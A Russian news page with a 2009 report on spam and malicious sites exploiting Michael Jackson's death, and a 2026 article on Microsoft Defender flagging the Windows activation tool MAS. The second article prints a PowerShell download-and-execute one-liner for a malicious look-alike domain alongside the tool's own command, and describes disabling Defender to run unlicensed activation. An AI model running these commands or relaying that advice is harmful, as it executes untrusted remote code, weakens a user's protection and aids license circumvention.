Спамеры решили заработать на смерти Майкла Джексона

Александр Панасенко 29 Июня 2009 - 14:37

...

Злоумышленники воспользовались смертью Майкла Джексона для распространения спама и вредоносных программ, сообщает PC World. Первый спам, связанный с этой темой, появился через несколько минут после смерти певца.

Многие пользователи получили письма, авторы которых предлагают узнать важные подробности, относительно смерти Майкла Джексона. Для этого требовалось лишь ответить на письмо.

Аналитики полагают, что эти письма не угрожают безопасности компьютеров пользователей, так как в них нет никаких ссылок или вложений. Скорее всего, они используются спамерами для проверки баз данных.

В спам-сообщениях другого типа содержатся ссылки на якобы эксклюзивные видеоролики или фотографии с Майклом Джексоном. Если пройти по ним, то на компьютер попадет вредоносное программное обеспечение.

Кроме того, вскоре после смерти певца появилось много тематических сайтов. При заходе пользователей на такие ресурсы в фоновом режиме запускается специальный код, который может нанести вред компьютеру.

Майкл Джексон скончался 25 июня в медцентре Калифорнийского университета в возрасте 50 лет. Официальная причина смерти певца будет названа через несколько недель. Вскрытие тела Джексона, проведенное 26 июня, показало, что он умер от естественных причин.

Источник

Следующая главная новость »

Подписывайтесь на телеграм-канал AM Live, чтобы всегда быть в курсе самых горячих и свежих новостей. Присоединяйтесь! »

Екатерина Быстрова 09 Января 2026 - 15:02

Windows Microsoft Windows Defender Домашние пользователи Корпорации Защита персональных компьютеров Персональный антивирус Microsoft

Microsoft Defender посчитал MAS вредоносом и заблокировал активацию Windows

Microsoft, похоже, решила всерьёз взяться за Microsoft Activation Scripts (MAS) — популярный инструмент с открытым исходным кодом для активации Windows. Компания знает, что под именем MAS в Сети давно распространяются фейковые сайты и зловредные скрипты, и начала автоматически блокировать их с помощью Microsoft Defender. Проблема в том, что под раздачу внезапно попал и настоящий MAS.

Пользователи заметили, что при попытке запустить команду активации через PowerShell система резко обрывает процесс, а Defender помечает скрипт как угрозу с детектом Trojan:PowerShell/FakeMas.DA!MTB.

Выглядит тревожно — но, судя по всему, это обычное ложноположительное срабатывание, а не целенаправленная «война» Microsoft с оригинальным проектом.

Важно понимать контекст. Совсем недавно разработчики MAS сами подтвердили, что в Сети появились поддельные сайты, распространяющие вредоносные версии скрипта. И вся разница между настоящей и фишинговой командой — в одном символе домена:

Оригинальный MAS:
irm https://get.activated.win | iex
Вредоносная подделка:
irm https://get.activate.win | iex
(без буквы d)

По всей видимости, Microsoft добавила в чёрный список слишком широкий набор доменов — и вместе с фейком заблокировала легитимный адрес. Ирония ситуации в том, что антивирус может мешать безопасному скрипту, тогда как фишинговый вариант теоретически мог остаться незамеченным.

На данный момент пользователям, у которых Defender включён (а он активен по умолчанию), приходится временно отключать защиту в Центре безопасности, выполнять активацию и сразу же включать защиту обратно. Решение не самое приятное, но рабочее — при одном важном условии.

Критически важно внимательно проверять домен. Отключать защиту и запускать фишинговый скрипт — это прямой путь к заражению системы, утечке данных и другим крайне неприятным последствиям.

Скорее всего, Microsoft исправит фильтрацию в одном из ближайших обновлений сигнатур Defender.